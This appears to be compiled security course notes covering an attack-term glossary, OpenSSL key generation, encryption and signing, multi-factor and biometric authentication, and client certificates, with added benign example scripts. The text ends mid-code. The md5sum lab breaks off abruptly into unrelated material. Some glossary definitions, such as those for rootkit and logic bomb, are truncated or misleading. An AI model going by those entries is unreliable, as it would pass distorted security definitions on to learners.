
IT PROFESSIONAL SECURITY SUPPORT

Module 1 Glossary
New terms and their definitions: Course 5 Week 1
Adware: Software that displays advertisements and collects data

Attack: An actual attempt at causing harm to a system

Availability: Means that the information we have is readily accessible to those people that
should have it

Backdoor: A way to get into a system when the normal ways in aren't allowed; it's a secret
entryway for attackers

Baiting: An attack that happens through actual physical contact, enticing a victim to do
something

Botnet: A collection of one or more Bots

Bots: Machines compromised by malware that are utilized to perform tasks centrally
controlled by an attacker

Brute force attacks: A common password attack which consists of just continuously trying
different combinations of characters and letters until one gets access

CIA Triad: Confidentiality, integrity, and availability. Three key principles of a guiding model
for designing information security policies

Confidentiality: Keeping things hidden

Cross-site scripting (XSS): A type of injection attack where the attacker can insert malicious
code and target the user of the service

Denial-of-Service (DoS) attack: An attack that tries to prevent access to a service for
legitimate users by overwhelming the network or server

Dictionary attack: A type of password attack that tries out words that are commonly used in
passwords, like password, monkey, football

Distributed Denial-of-Service (DDoS) attack: A DoS attack using multiple systems

DNS Cache Poisoning Attack: It works by tricking a DNS server into accepting a fake DNS
record that will point you to a compromised DNS server

Evil twin: The premise of an evil twin attack is for you to connect to a network that is
identical to yours but that is controlled by an attacker. Once connected to it, they will be able
to monitor your traffic

Exploit: Software that is used to take advantage of a security bug or vulnerability

Hacker: Someone who attempts to break into or exploit a system

Half-open attacks: A way to refer to SYN floods

Injection attacks: A common security exploit that can occur in software development and
runs rampant on the web, where an attacker injects malicious code

Integrity: Means keeping our data accurate and untampered with

Keylogger: A common type of spyware that's used to record every keystroke you make

Logic bomb: A type of Malware that's intentionally installed

Malware: A type of malicious software that can be used to obtain your sensitive information
or delete or modify files

Meddler in the middle (formerly known as Man in the Middle): An attack that places the
attacker in the middle of two hosts that think they're communicating directly with each other

Password attacks: Utilize software like password crackers that try and guess your password

Phishing attack: It usually occurs when a malicious email is sent to a victim disguised as
something legitimate

Ping flood: It sends tons of ping packets to a system. If a computer can't keep up with this,
then it's prone to being overwhelmed and taken down

Ransomware: A type of attack that holds your data or system hostage until you pay some
sort of ransom

Risk: The possibility of suffering a loss in the event of an attack on the system

Rogue Access Point (AP) Attack: An access point that is installed on the network without the
network administrator's knowledge

Rootkit: A collection of software or tools that an admin would use

Screen lock: A security feature that helps prevent unwanted access by creating an action you
have to do to gain entry

Session hijacking (cookie hijacking): A common meddler in the middle attack

Social engineering: An attack method that relies heavily on interactions with humans instead
of computers

Spear phishing: Phishing that targets an individual or group; the fake emails may contain some
personal information like your name, or the names of friends or family

Spoofing: When a source is masquerading as something else

Spyware: The type of malware that's meant to spy on you

SQL Injection Attack: An attack that targets the entire website if the website is using a SQL
database

SYN flood: The server is bombarded with SYN packets

Tailgating: Gaining access into a restricted area or building by following a real employee in

Threat: The possibility of danger that could exploit a vulnerability

Trojan: Malware that disguises itself as one thing but does something else

Viruses: The best known type of malware

Vulnerability: A flaw in the system that could be exploited to compromise the system

Worms: They are similar to viruses except that instead of having to attach themselves onto
something to spread, worms can live on their own and spread through channels like the
network

0-Day Vulnerability (Zero Day): A vulnerability that is not known to the software developer
or vendor, but is known to an attacker

Creating/inspecting a key pair, encrypting/decrypting and signing/verifying using OpenSSL

Introduction
In this lab, you'll learn how to generate RSA private and public key pairs using the
OpenSSL utility.
OpenSSL is a commercial-grade utility toolkit for Transport Layer Security (TLS) and
Secure Sockets Layer (SSL) protocols. It's also a general-purpose cryptography library.
OpenSSL is licensed under an Apache-style license, which means that you're free to get
it and use it for commercial and non-commercial purposes (subject to some simple
license conditions).

What you'll do

- OpenSSL: You'll explore what generating key pairs looks like using OpenSSL.
- Encrypt and decrypt: You'll use the key pair to encrypt and decrypt some small amount of data.
- Verify: You'll use the key pair to sign and verify data to ensure its accuracy.

Start the lab

You'll need to start the lab before you can access the materials. To do this, click the
green “Start Lab” button at the top of the screen.

After you click the “Start Lab” button, you will see a shell, where you will be performing
further steps in the lab. You should have a shell that looks like this:

Generating keys

Before you can encrypt or decrypt anything, you need a private and a public key, so let's
generate those first!

Generating a private key

Remember, a key pair consists of a public key that you can make publicly available, and
a private key that you need to keep secret. Shhhh. :) When someone wants to send you
data and make sure that no one else can view it, they can encrypt it with your public key.
Data that's encrypted with your public key can only be decrypted with your private key, to
ensure that only you can view the original data. This is why it's important to keep private
keys a secret! If someone else had a copy of your private key, they'd be able to decrypt
data that's meant for you. Not good!

First, let's generate a 2048-bit RSA private key, and take a look at it. To generate the key,
enter this command into the terminal:

openssl genrsa -out private_key.pem 2048


You should see the following output (or something very similar) :

Generating RSA private key, 2048 bit long modulus (2 primes)
................+++++
..........................................+++++
e is 65537 (0x010001)

This command creates a 2048-bit RSA key, called "private_key.pem". The name of the
key is specified after the "-out" flag, and typically ends in ".pem". The number of bits is
specified with the last argument. To view your new private key, use "cat" to print it to the
screen, just like any other file:

cat private_key.pem
The contents of the private key file are a PEM block, between a -----BEGIN RSA PRIVATE KEY-----
line and an -----END RSA PRIVATE KEY----- line, holding what looks like a large jumble of random
characters. This is correct, so don't worry about not being able to read it.

Heads up: your private key will look similar to the example, but it won't be the same. This is
super important, because if openssl was generating the same keys over and over, we'd be in
serious trouble!

Click Check my progress to verify the objective.


Generating a public key

Now that you have a private key, let's generate the public key that goes along with it, and
inspect that one, too. You can give the public key to anyone who wants to send you encrypted
data. When data is encrypted using your public key, nobody will be able to decrypt it unless
they have your private key. To create a public key based on a private key, enter the command
below. You should see the following output:

openssl rsa -in private_key.pem -outform PEM -pubout -out public_key.pem


writing RSA key


You can view the public key in the same way that you viewed the private key. It should
look like a bunch of random characters, like the private key, but different and slightly
shorter.

cat public_key.pem
Heads up: like your private key, your public key will look different from the example.

Now that both of your keys have been created, you can start using them to encrypt and
decrypt data. Let's dive in!

Click Check my progress to verify the objective.


Encrypting and decrypting

You'll simulate someone encrypting a file using your public key and sending it to you,
which allows you (and only you!) to decrypt it using your private key. Similarly, you can
encrypt files using other people's public keys, knowing that only they will be able to
decrypt them.

You'll create a text file that contains some information you want to protect by encrypting
it. Then, you'll encrypt and inspect it. To create the file, enter the command below. It will
create a new text file called "secret.txt" which just contains the text, "This is a secret
message, for authorized parties only". Feel free to change this message to anything
you'd like.

echo 'This is a secret message, for authorized parties only' > secret.txt

Then, to encrypt the file using your public key, enter this command:

openssl rsautl -encrypt -pubin -inkey public_key.pem -in secret.txt -out secret.enc

This creates the file "secret.enc", which is an encrypted version of "secret.txt". Notice
that if you try to view the contents of the encrypted file, the output is garbled. This is
totally normal for encrypted messages because they're not meant to have their contents
displayed visually.
Here's an example of what displaying the encrypted file "secret.enc" looks like in the
nano editor, using this command:

nano ~/secret.enc

Output: the file is displayed as a screen of unreadable control characters and symbols (shown
by nano as sequences like ^@, ^R and ^T), with the nano shortcut bar (^G Get Help, ^O Write Out,
^X Exit, and so on) along the bottom.
To exit from the nano editor, use the command Ctrl-X.

The encrypted file will now be ready to send to whoever holds the matching private key.
Since that's you, you can decrypt it and get the original contents back. Remember that
we must use the private key to decrypt the message, since it was encrypted using the
public key. Go ahead and decrypt the file, using this command:

openssl rsautl -decrypt -inkey private_key.pem -in secret.enc



This will print the contents of the decrypted file to the screen, which should match the
contents of "secret.txt":

This is a secret message, for authorized parties only


Click Check my progress to verify the objective.

Encrypting and decrypting


Check my progress

Creating a hash digest

Now, you'll create a hash digest of the message, then create a digital signature of this
digest. Once that's done, you'll verify the signature of the digest. This allows you to
ensure that your message wasn't modified or forged. If the message was modified, the
hash would be different from the signed one, and the verification would fail.

To create a hash digest of the message, enter this command:

openssl dgst -sha256 -sign private_key.pem -out secret.txt.sha256 secret.txt

This creates a file called "secret.txt.sha256" using your private key. It contains the digital
signature over the SHA-256 hash digest of your secret text file.

With this file, anyone can use your public key and the signed digest to verify that the file
hasn't been modified since you signed it. To perform this verification, enter this command:

openssl dgst -sha256 -verify public_key.pem -signature secret.txt.sha256 secret.txt

This should show the following output, indicating that the verification was successful
and the file hasn't been modified by a malicious third party:

Verified OK

If any other output is shown, the contents of the file have been changed, and the file is
likely no longer safe.
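The whole lab flow as a script, added here as an example and not part of the lab: it generates the key pair, encrypts and decrypts, signs and verifies, then shows two failure cases the lab only hints at (a tampered file fails verification, and RSA on its own refuses a message longer than the modulus allows). It assumes the openssl CLI is installed, uses pkeyutl in place of the deprecated rsautl, and the lab_* function names and working-directory layout are this example's own.

```shell
#!/bin/sh
# Added example, not part of the lab: key pair, encrypt/decrypt and sign/verify as
# shell functions, plus two failure modes. pkeyutl replaces rsautl, which current
# OpenSSL releases mark deprecated; the key file names follow the lab.
set -eu

# 1. Generate the key pair into directory $1, exactly as in the lab.
lab_keygen() {   # $1 = key dir
  mkdir -p "$1"
  openssl genrsa -out "$1/private_key.pem" 2048 2>/dev/null
  openssl rsa -in "$1/private_key.pem" -pubout -out "$1/public_key.pem" 2>/dev/null
}

# 2. Encrypt $2 with the public key, then decrypt it again with the private key.
#    Echoes "match" if the round trip reproduces the plaintext, "mismatch" otherwise.
#    OAEP padding is used instead of the PKCS#1 v1.5 default that rsautl applied.
lab_roundtrip() {   # $1 = key dir, $2 = plaintext file (absolute path)
  openssl pkeyutl -encrypt -pubin -inkey "$1/public_key.pem" \
      -pkeyopt rsa_padding_mode:oaep -in "$2" -out "$2.enc"
  openssl pkeyutl -decrypt -inkey "$1/private_key.pem" \
      -pkeyopt rsa_padding_mode:oaep -in "$2.enc" -out "$2.dec"
  if cmp -s "$2" "$2.dec"; then echo match; else echo mismatch; fi
}

# 3a. Sign the SHA-256 digest of $2 with the private key; signature goes to $2.sha256.
lab_sign() {   # $1 = key dir, $2 = file
  openssl dgst -sha256 -sign "$1/private_key.pem" -out "$2.sha256" "$2"
}

# 3b. Verify signature $3 over file $2 with the public key. Echoes "ok" or "rejected".
#     The exit status is checked rather than the printed text, because the failure
#     wording differs between OpenSSL versions.
lab_verify() {   # $1 = key dir, $2 = file, $3 = signature file
  if openssl dgst -sha256 -verify "$1/public_key.pem" -signature "$3" "$2" >/dev/null 2>&1; then
    echo ok
  else
    echo rejected
  fi
}

# RSA-2048 can encrypt at most 245 bytes (PKCS#1 v1.5) or 214 bytes (OAEP, SHA-1)
# in one operation; longer inputs are refused. Echoes "accepted" or "rejected".
lab_encrypt_status() {   # $1 = key dir, $2 = file
  if openssl pkeyutl -encrypt -pubin -inkey "$1/public_key.pem" \
        -pkeyopt rsa_padding_mode:oaep -in "$2" -out /dev/null 2>/dev/null; then
    echo accepted
  else
    echo rejected
  fi
}

# Stand-alone demo mirroring the lab's steps, then the two failure cases.
WORK=$(mktemp -d)
lab_keygen "$WORK"
printf '%s\n' 'This is a secret message, for authorized parties only' > "$WORK/secret.txt"
echo "encrypt/decrypt round trip: $(lab_roundtrip "$WORK" "$WORK/secret.txt")"
lab_sign "$WORK" "$WORK/secret.txt"
echo "verify original file:       $(lab_verify "$WORK" "$WORK/secret.txt" "$WORK/secret.txt.sha256")"
printf 'X' >> "$WORK/secret.txt"        # tamper with the file after signing
echo "verify tampered file:       $(lab_verify "$WORK" "$WORK/secret.txt" "$WORK/secret.txt.sha256")"
head -c 300 /dev/zero | tr '\0' 'A' > "$WORK/big.txt"
echo "encrypt a 300-byte message: $(lab_encrypt_status "$WORK" "$WORK/big.txt")"
rm -rf "$WORK"
```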

Click Check my progress to verify the objective.


Conclusion

Woohoo! You've successfully used openssl to create both a public and a private key. You
used them to practice file encryption and decryption, and to create and verify digital
signatures.

End your lab


When you have completed your lab, click End Lab. Qwiklabs removes the resources
you’ve used and cleans the account for you.

You will be given an opportunity to rate the lab experience. Select the applicable number
of stars, type a comment, and then click Submit.

The number of stars indicates the following:

- 1 star = Very dissatisfied
- 2 stars = Dissatisfied
- 3 stars = Neutral
- 4 stars = Satisfied
- 5 stars = Very satisfied

You can close the dialog box if you don't want to provide feedback.
For feedback, suggestions, or corrections, please use the Support tab.

Introduction
In this lab, you'll have hands-on practice demonstrating hashing and hash verification
using md5sum and shasum tools.
md5sum is a hashing program that calculates and verifies 128-bit MD5 hashes. As with all
hashing algorithms, there is in theory an unlimited number of files that will have any given
MD5 hash. md5sum is used to verify the integrity of files.

Similarly, shasum is a hashing program that calculates and verifies SHA hashes. It's also
commonly used to verify the integrity of files.

In this lab, you'll see that almost any change to a file will cause its MD5 hash or SHA
hashes to change.

What you'll do

- Compute: You'll create a text file and generate hashes using the md5sum and shasum tools.
- Inspect: After you generate the hash digests, you'll inspect the resulting files.
- Verify: You'll verify the hash using the md5sum and shasum tools.
- Modify: You'll modify the text file and compare these results to the original hash to
observe how the digest changes and how the hash verification process fails.

Start the lab

You'll need to start the lab before you can access the materials. To do this, click the
green “Start Lab” button at the top of the screen.

After you click the “Start Lab” button, you will see a shell, where you will be performing
further steps in the lab. You should have a shell that looks like this:
MD5

The other category of multi-factor authentication is biometrics, which has gained in popularity in recent
years, especially in mobile devices. Biometric authentication is the process of using unique physiological
characteristics of an individual to identify them. By confirming the biometric signature, the individual is
authenticated. A very common use of this in mobile devices is fingerprint scanners to unlock a phone. This
works by registering your fingerprints first using an optical sensor that captures images of the unique
pattern of your fingerprint. Much like how passwords should never be stored in plain text, biometric data
used for authentication should also never be stored directly. This is even more important for handling
biometric data. Unlike passwords, biometrics are an inherent part of who someone is, so there are privacy
implications to theft or leaks of biometric data. Biometric characteristics can also be super difficult to
change in the event that they're compromised, unlike passwords. So instead of storing the fingerprint data
directly, the data is run through a hashing algorithm, and the resulting unique hash is stored. One
advantage of biometric authentication over knowledge- or token-based systems is that it's more reliable
for identifying an individual for authentication, since biometric features aren't usually shareable. For
example, you can't give your friend your fingerprints so that they can log in as you. Well, you would hope
not, anyway.

But as schools start to introduce fingerprint-based attendance recording systems, students are finding
ways to trick the system. They're creating fake fingerprints using things like glue, allowing friends to mark
each other as present if they're late or if they skip school. This is harder to achieve than sharing a
password, but it's sort of ingenious of these kids to think up. They really go the extra mile to skip school
these days, not that I'm condoning this behavior. Other biometric systems use features like iris scans,
facial recognition, gait detection and even voice. Microsoft developed the biometric authentication system
for Windows 10 called Windows Hello, which supports fingerprint identification, iris identification and
facial recognition. It uses two cameras, one for color and one for infrared, which allows for depth
detection. This way it's not possible to trick the system using a printout of an authorized user's face.

An evolution of physical tokens is U2F, or universal second factor. It's a standard developed jointly by
Google, Yubico, and NXP Semiconductors. The finalized standards for U2F are being hosted by the FIDO
Alliance. U2F incorporates a challenge-response mechanism along with public key cryptography to
implement a more secure and more convenient second-factor authentication solution. U2F tokens are
referred to as security keys and are available from a range of manufacturers. Security keys are essentially
small embedded crypto processors that have secure storage of asymmetric keys, and additional slots to
run embedded code. Let's do a quick rundown on how exactly security keys work and how they're an
improvement over an OTP solution. The first step is registration, since the security key must be registered
with a site or service. At registration time, the security key generates a private-public key pair unique to
that site and submits the public key to the site for registration. It also binds the identity of the site with
the key pair. The reason for unique key pairs for each site is for privacy reasons. If a site is compromised,
this prevents cross-referencing registered public keys and discovering commonalities between sites based
on registration data. Once registered with the site, the next time you're prompted to authenticate, you'll
be prompted for your username and password as usual. But afterwards, you'll be prompted to tap your
security key. When you physically tap the security key, it's a small check for user presence to ensure
malware can't authenticate on your behalf without your knowledge.

This tap will unlock the private keys stored in the security key, which are used to authenticate. The
authentication happens as a challenge-response process, which protects against replay attacks. This is
because the authentication session can't be used again later by an eavesdropper, because the challenge
and resulting response will be different with every authentication session. What happens is the site
generates a challenge, essentially some randomized data, and sends this to the client that's attempting
to authenticate. The client will then select the private key matching this site, use this key to sign the
challenge, and send the signed data back. The site can now verify the signature using the public key that
was registered earlier. If the signature checks out, the user is authenticated. From a security perspective,
this is a much more secure design than OTPs. This is because the authentication flow is protected from
phishing attacks, given the interactive nature of the process. Security keys are also resistant to cloning
or forgery because they have unique embedded secrets on them and are protected from tampering. From
the convenience perspective, this is a much nicer authentication flow compared to OTPs, since the user
doesn't have to manually transcribe a string of numbers into the authentication dialog. All they have to
do is tap their security key, nice and easy. As an IT support specialist, you may come across multi-factor
authentication setups that you'd be responsible for supporting. You might even be tasked with helping to
implement one. So it's important to understand how they provide enhanced account protection, along
with the options that are available.
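A toy simulation of the registration and challenge-response flow just described, added as an example and not part of the course: the openssl CLI stands in for the security key's crypto processor, with one P-256 key pair per site, a fresh random challenge per login, and checks showing that a replayed response and a response signed with the key registered at another site are both rejected. The u2f_* function names, the site names and the key directory layout are this example's assumptions.

```shell
#!/bin/sh
# Added example (not from the course): a toy U2F registration and challenge-response
# flow using the openssl CLI. The "security key" is a directory of per-site private
# keys; each "site" keeps only the public key it received at registration.
set -eu

# Stands in for the security key's secure storage (constructed here).
KEYDIR=${KEYDIR:-$(mktemp -d)}

# Registration: generate a fresh P-256 key pair bound to this site and hand the
# site only the public half. One pair per site means two sites cannot correlate
# the same user by comparing the public keys registered with them.
u2f_register() {   # $1 = site name
  openssl ecparam -genkey -name prime256v1 -noout -out "$KEYDIR/$1.key" 2>/dev/null
  openssl ec -in "$KEYDIR/$1.key" -pubout -out "$KEYDIR/$1.pub" 2>/dev/null
}

# The site issues a fresh random challenge for every authentication attempt, so a
# captured response is useless later: the next challenge will be different.
u2f_challenge() {
  openssl rand -hex 32
}

# The client selects the private key bound to this site and signs the challenge.
# (In the real protocol the physical tap is what releases the key for signing.)
u2f_sign() {   # $1 = site name, $2 = challenge, $3 = output signature file
  printf '%s' "$2" | openssl dgst -sha256 -sign "$KEYDIR/$1.key" -out "$3"
}

# The site verifies the response against the public key stored at registration.
# Echoes "authenticated" or "rejected", decided on openssl's exit status rather
# than its printed text, which differs between versions.
u2f_verify() {   # $1 = site name, $2 = challenge, $3 = signature file
  if printf '%s' "$2" |
     openssl dgst -sha256 -verify "$KEYDIR/$1.pub" -signature "$3" >/dev/null 2>&1; then
    echo authenticated
  else
    echo rejected
  fi
}

# Stand-alone demo: a legitimate login, the same response replayed against a new
# challenge, and a response signed with the key registered at a different site.
u2f_register example-bank
u2f_register example-mail
CHAL=$(u2f_challenge)
SIG=$(mktemp)
u2f_sign example-bank "$CHAL" "$SIG"
echo "fresh response at example-bank:             $(u2f_verify example-bank "$CHAL" "$SIG")"
echo "same response replayed later:               $(u2f_verify example-bank "$(u2f_challenge)" "$SIG")"
echo "example-bank response sent to example-mail: $(u2f_verify example-mail "$CHAL" "$SIG")"
```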

Physical Privacy and Security Components


Physical privacy and security
In this reading, you will learn more about physical privacy and security, including biometric and Near Field
Communication authentication. You will also revisit the “confidentiality” aspect of the CIA Principle
(Confidentiality, Integrity, Availability), which was introduced previously in this certificate program.

CIA Principle: Confidentiality

Preventing unauthorized access to an organization's data and networks is imperative in protecting a
company's information systems. Regulations, standards, and laws may also require that certain
information be kept confidential, like health records. Failing to ensure the confidentiality of specific types
of data could result in damage to reputation, loss of customers, liability lawsuits, financial losses, penalty
fines, criminal charges, and more. It is vital for IT Support specialists to take all measures possible to
protect confidential information.  

In a previous video, you learned about three types of authentication methods:

- Something you know - password or PIN
- Something you have - bank card, USB device, key fob, or OTP (one-time password)
- Something you are - biometric data, like a fingerprint, voice signature, facial recognition, or retinal
scan

You will learn more about biometrics in this reading, along with two additional categories of
authentication methods:

- Somewhere you are - geofencing, GPS, Indoor Positioning Systems (IPS)
- Something you do - gestures, swipe patterns, CAPTCHA, or patterns of behavior

Some authentication technologies inherently require two factors:

- Somewhere you are + Something you have - Near Field Communication (NFC) uses both proximity
to an NFC scanner and a device like an NFC-enabled smartphone or an RFID chip on an employee
ID or bank card.

Something you are: Biometrics

Biometric authentication occurs in two steps: enrollment and authentication. Enrollment happens when
the user provides their biometric data for the first time through a hardware scanner. Specific features of
that biometric data are extracted, encrypted, and stored, often in a database or on a personal mobile
device. Authentication, as the second step, happens when a user presents their biometric data again to the
scanner to gain access to the secured item. This new scan is compared against the original stored
biometric data to authenticate the person’s identity. 

Fingerprint scanning 
In a previous video, you learned about fingerprint scanners as an authentication method for mobile
devices. Fingerprint scanners use small capacitive cells that are engineered to detect fingerprint ridges.
Dirt and moisture can interfere with the scanner’s ability to do its job. As an IT Support specialist, you may
need to replace damaged fingerprint scanners on customer devices.

Facial recognition
Many smartphone models provide the hardware and software to use facial recognition as a biometric
authentication method. This often requires two cameras. The first camera uses normal color photography.
The second camera uses infrared technology to measure depth and ensure your face is 3-dimensional. This
prevents hackers from using photographs of the authorized users to unlock mobile devices. 

Iris and Retinal scanning

Iris scanning is not a secure form of biometric authentication because a photograph of the user's iris can be
used to gain access. In contrast, retinal scanning is one of the more secure forms of biometric
authentication. It is exceedingly difficult to impersonate the retinal features of a person’s eye. Our retinas
have unique and complex patterns in how our blood vessels are arranged. These fingerprint-like patterns
can be scanned by shining a beam of infrared light into the eye. Note that eye injuries and medical
problems with the eyes can change retinal blood vessel patterns and cause users to be denied access to
their devices.  Although retinal scanning is secure, the technology can be expensive and difficult to
implement.

Somewhere you are: Geolocation

The geographical location of a user can serve as one part of a multi-factor authentication policy or to deny
access to users based on their locations. Geolocation services can use GPS, IP ranges, WiFi access points,
cell phone towers, and/or Bluetooth beacons to estimate a mobile user's location.

Geofencing
Geofencing is used to authenticate users who are physically within a certain radius of a specific location.
For example, if you order food using McDonald’s smartphone app, the restaurant will not process your
order until your smartphone is within a certain radius of the restaurant. You cannot send someone else to
pick up your order either, as that person cannot authenticate without your smartphone being within the
geofencing radius.  

Global Positioning Systems (GPS)

Global Positioning Systems (GPS) use satellites orbiting Earth to map a device's longitude and latitude. The
mobile device needs to be equipped with GPS sensors and have GPS services enabled to take advantage of
GPS-based authentication technologies. GPS could be used to authenticate a device based on the physical
location of the user. Insurance companies use GPS data to verify the authenticity of disaster claims filed
through mobile apps. 

Indoor Positioning Systems (IPS)

Indoor Positioning Systems (IPS) triangulate a device's location by using WiFi access points, cell phone
towers, and/or Bluetooth beacons. Users must grant permission to apps to use this technology. IPS
locations might be used to deny network access when the user has entered a restricted area.

Near-field communication (NFC) and scanners

You may have interacted with a near-field communication (NFC) scanner by using contactless payments
with a credit card, bank card, or smartphone. NFC technology can also be used for authentication and
access to physical buildings through school or employment ID cards.

NFC transmits on the same frequency as high-frequency RFID (13.56 MHz) and has a short range of about
10 centimeters. The short range provides some protection from hackers attempting to intercept the
connection to obtain your credit card information. However, NFC is not fully secure. An innocuous-looking
NFC scanner sitting next to an NFC-enabled payment device could record all NFC transactions that occur
within 10 cm of the device in a "man in the middle" security breach.

Something you do: Gestures and Behaviors

You may already be familiar with using gestures like swipe patterns to unlock a smartphone. Another
gesture-based authentication method is the Picture Password, which requires the user to touch specific,
secret points on a photograph to unlock the device.

Patterns of people’s behaviors can be used to authenticate identity. For example, an organization might
keep track of computer system login and logout times of employees. These patterns could be monitored
for any unusual changes in employee behavior, which may indicate that the “employee” is instead an
imposter. 

Turing tests are used to determine if an unknown entity is a human or a machine. You have probably
responded to a CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart)
to authenticate that you are indeed a human and not a bot. This is accomplished by asking the user to
identify items within a set of photographs. Photos are used for this test because images are more difficult
for bots to identify than text. 

Key takeaways

There are a variety of MFA protocols that can be implemented to protect the confidentiality, privacy, and
security of data and networks. The 5 types of authentication can be categorized as:

1. Something you know - password or PIN
2. Something you have - bank card, USB device, key fob, or OTP (one-time password)
3. Something you are - biometric data, like a fingerprint, voice signature, facial recognition, or retinal
scan
4. Somewhere you are - geolocation, geofencing, GPS, Indoor Positioning Systems (IPS), NFC
scanning
5. Something you do - gestures, swipe patterns, CAPTCHA, or patterns of behavior

Resources for more information

For more information about methods of authentication to protect data, please visit:

- Geolocation: The Risk and Benefits of a Trending Technology - Discusses impacts, benefits, risks,
risk mitigation, security, governance, and privacy concerns of geolocation technologies.
- Understanding The 5 Factors Of Multi-Factor Authentication - Overview of the 5 factors:
Something you know, Something you have, Something you are, Somewhere you are, and
Something you do.
- Homeland Security Biometrics - History and use cases of biometrics for maximum security and
identification of criminals in the United States Departments of Homeland Security, Defense,
Justice, and Commerce, as well as the National Institute of Standards and Technology.
- A Review on Authentication Methods - Informative peer-reviewed journal article on authentication
methods.
- Modern Authentication Methods: A Comprehensive Survey - Peer-reviewed journal article with
expanded coverage of two-factor and multi-factor authentication topics. Provides comprehensive
comparisons of advantages and disadvantages of each authentication method.
- What is the Difference Between NFC and RFID? - A comparison of NFC and RFID technologies.
- Fingerprint Reader Replacement Guide - Provides photos of internal fingerprint scanner hardware
parts, as well as instructions on how to replace a fingerprint scanner on a laptop.

Supplemental Reading for Authentication

They’re creating fake fingerprints using things like glue, allowing friends to mark each other as present if they’re late or skip school.
As we learned earlier, certificates are public keys that are signed by a certificate authority, or CA, as a sign of trust. We covered TLS server certificates, but there can also be client certificates. These operate very similarly to server certificates but are presented by clients and allow servers to authenticate and verify clients. As an IT support specialist, it's important for you to understand client certificates and certificate-based authentication, since you might encounter these in the course of your career. It's not uncommon for VPN systems or enterprise Wi-Fi setups to use client certificates for authentication, so understanding how they work will help you troubleshoot issues.

In order to issue client certificates, an organization must set up and maintain CA infrastructure to issue and sign certificates. Part of certificate authentication also involves the client authenticating the server, giving us mutual authentication. This is a positive thing, since the client can verify that it's talking to the real authentication server and not an impersonator. In this case, all clients that are using certificate authentication would also need to have the CA certificate in their certificate trust store. This establishes trust with the CA and allows the client to verify it's talking to the real server when trying to authenticate.

Certificate authentication is like presenting identification at the airport: you show your ID, or your certificate, to prove who you are. The ID is checked to see if it was issued by an authority that is trusted by the verifier. Was it issued by a government entity, or is it a novelty license from a gift shop? Obviously, only one of those IDs would be accepted at the airport, just as only a certificate signed by a trusted CA is accepted. When you're at the airport, the expiration date on your ID will also be checked to ensure it's still valid. The same thing applies to certificate authentication, although certificates have two dates that need to be verified: not valid before and not valid after. Not valid before checks whether the certificate is valid yet, since it's possible to have certificates issued for future use. Not valid after is a straightforward expiration date, after which the certificate is no longer valid.

Airport authorities also have a list of specific IDs that are flagged; if your ID is on that list, then you'll be rejected for air travel. Similarly, the certificate will be checked against the certificate revocation list, or CRL. This is a signed list published by the CA which defines certificates that have been explicitly revoked.

One last step that's performed as part of the authentication server's verification process is to prove possession of the corresponding private key, since the certificate only contains a signed public key. If we don't prove possession, there's nothing stopping an attacker from copying the certificate, since it's not considered secret, and pretending to be the owner. To avoid this, possession of the private key is verified through a challenge-response mechanism: the server requests a randomized bit of data to be signed using the private key corresponding to the public key presented for authentication. This is similar to how the airport checks the photo on your ID to make sure you look like the person in the photo and aren't impersonating them.
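The airport analogy maps onto a handful of concrete checks. The following Go program is an added example (it is not part of the course material): it builds a throwaway CA and two client certificates, then performs the verifier's checks, trusted issuer, the not-valid-before/not-valid-after window, client-authentication usage and revocation, followed by the challenge-response proof of possession. Everything in it is constructed for illustration: the CA name, the certificate names and lifetimes, and the revocation list, which is modelled as a plain set of serial numbers rather than a parsed, signature-checked CRL.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Verifier is the authenticating server's view: its trust store (the CA certificate) and
// the serials on the CA's CRL. Assumption: the CRL is modelled as a plain set here; a real
// server fetches the CA's signed CRL and checks its signature before using it.
type Verifier struct {
	Roots   *x509.CertPool
	Revoked map[string]bool
}

// CheckCertificate is the "ID check": trusted issuer, now inside the NotBefore/NotAfter
// window, issued for client authentication, and not on the CRL.
func (v Verifier) CheckCertificate(cert *x509.Certificate, now time.Time) error {
	_, err := cert.Verify(x509.VerifyOptions{
		Roots:       v.Roots,
		CurrentTime: now, // Verify rejects certificates outside [NotBefore, NotAfter]
		KeyUsages:   []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	})
	if err != nil {
		return fmt.Errorf("chain check failed: %w", err)
	}
	if v.Revoked[cert.SerialNumber.String()] {
		return fmt.Errorf("certificate %s is on the CRL", cert.SerialNumber)
	}
	return nil
}

// SignChallenge is the client's proof of possession: only the private key holder can sign
// the random bytes the server sent.
func SignChallenge(key *ecdsa.PrivateKey, challenge []byte) ([]byte, error) {
	h := sha256.Sum256(challenge)
	return ecdsa.SignASN1(rand.Reader, key, h[:])
}

// CheckProofOfPossession verifies that signature with the public key inside the certificate,
// so a copied certificate without its private key cannot pass.
func CheckProofOfPossession(cert *x509.Certificate, challenge, sig []byte) bool {
	h := sha256.Sum256(challenge)
	pub, ok := cert.PublicKey.(*ecdsa.PublicKey)
	return ok && ecdsa.VerifyASN1(pub, h[:], sig)
}

// mint generates a P-256 key and a certificate for tmpl, self-signed when parent is nil.
func mint(tmpl, parent *x509.Certificate, signer *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	if parent == nil {
		parent, signer = tmpl, key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, signer)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// Scenario is the constructed demo PKI: one CA, a valid client certificate with its key,
// and a second client certificate that the CA has since revoked.
type Scenario struct {
	Verifier               Verifier
	ValidCert, RevokedCert *x509.Certificate
	ValidKey               *ecdsa.PrivateKey
}

// BuildScenario issues everything relative to now: the client certificates are valid from
// one hour ago until eleven hours from now.
func BuildScenario(now time.Time) (*Scenario, error) {
	caCert, caKey, err := mint(&x509.Certificate{SerialNumber: big.NewInt(1),
		Subject: pkix.Name{CommonName: "Example Client CA"}, IsCA: true, BasicConstraintsValid: true,
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(48 * time.Hour),
		KeyUsage: x509.KeyUsageCertSign | x509.KeyUsageCRLSign}, nil, nil)
	if err != nil {
		return nil, err
	}
	s := &Scenario{Verifier: Verifier{Roots: x509.NewCertPool(), Revoked: map[string]bool{}}}
	s.Verifier.Roots.AddCert(caCert)
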